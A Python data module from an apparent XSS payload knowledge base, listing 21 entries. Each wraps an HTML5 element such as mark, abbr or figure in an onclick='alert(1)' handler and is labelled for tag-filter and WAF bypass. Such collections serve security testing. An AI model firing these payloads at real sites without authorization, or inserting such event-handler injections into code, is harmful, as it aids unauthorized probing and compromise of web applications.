#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Absolute Final XSS Payloads - Part 2
HTML5 elements (part 2).
"""

from ..models import PayloadEntry


BRS_KB_ABSOLUTE_FINAL_PAYLOADS_PART2 = {
    "html5-mark-element": PayloadEntry(
        payload='<mark onclick="alert(1)">click</mark>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 mark element",
        tags=["html5", "mark"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-ins-element": PayloadEntry(
        payload='<ins onclick="alert(1)">click</ins>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 ins element",
        tags=["html5", "ins"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-del-element": PayloadEntry(
        payload='<del onclick="alert(1)">click</del>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 del element",
        tags=["html5", "del"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-dfn-element": PayloadEntry(
        payload='<dfn onclick="alert(1)">click</dfn>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 dfn element",
        tags=["html5", "dfn"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-abbr-element": PayloadEntry(
        payload='<abbr onclick="alert(1)">click</abbr>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 abbr element",
        tags=["html5", "abbr"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-cite-element": PayloadEntry(
        payload='<cite onclick="alert(1)">click</cite>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 cite element",
        tags=["html5", "cite"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-var-element": PayloadEntry(
        payload='<var onclick="alert(1)">click</var>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 var element",
        tags=["html5", "var"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-samp-element": PayloadEntry(
        payload='<samp onclick="alert(1)">click</samp>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 samp element",
        tags=["html5", "samp"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-kbd-element": PayloadEntry(
        payload='<kbd onclick="alert(1)">click</kbd>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 kbd element",
        tags=["html5", "kbd"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-sub-element": PayloadEntry(
        payload='<sub onclick="alert(1)">click</sub>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 sub element",
        tags=["html5", "sub"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-sup-element": PayloadEntry(
        payload='<sup onclick="alert(1)">click</sup>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 sup element",
        tags=["html5", "sup"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-s-element": PayloadEntry(
        payload='<s onclick="alert(1)">click</s>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 s element",
        tags=["html5", "s"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-small-element": PayloadEntry(
        payload='<small onclick="alert(1)">click</small>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 small element",
        tags=["html5", "small"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-q-element": PayloadEntry(
        payload='<q onclick="alert(1)">click</q>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 q element",
        tags=["html5", "q"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-code-element": PayloadEntry(
        payload='<code onclick="alert(1)">click</code>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 code element",
        tags=["html5", "code"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-pre-element": PayloadEntry(
        payload='<pre onclick="alert(1)">click</pre>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 pre element",
        tags=["html5", "pre"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-blockquote-element": PayloadEntry(
        payload='<blockquote onclick="alert(1)">click</blockquote>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 blockquote element",
        tags=["html5", "blockquote"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-address-element": PayloadEntry(
        payload='<address onclick="alert(1)">click</address>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 address element",
        tags=["html5", "address"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-figcaption-element": PayloadEntry(
        payload='<figure><figcaption onclick="alert(1)">click</figcaption></figure>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 figcaption element",
        tags=["html5", "figcaption"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-figure-element": PayloadEntry(
        payload='<figure onclick="alert(1)">click</figure>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 figure element",
        tags=["html5", "figure"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
    "html5-main-element": PayloadEntry(
        payload='<main onclick="alert(1)">click</main>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="HTML5 main element",
        tags=["html5", "main"],
        bypasses=["tag_filters"],
        waf_evasion=True,
        browser_support=["chrome", "firefox", "safari", "edge"],
        reliability="high",
    ),
}
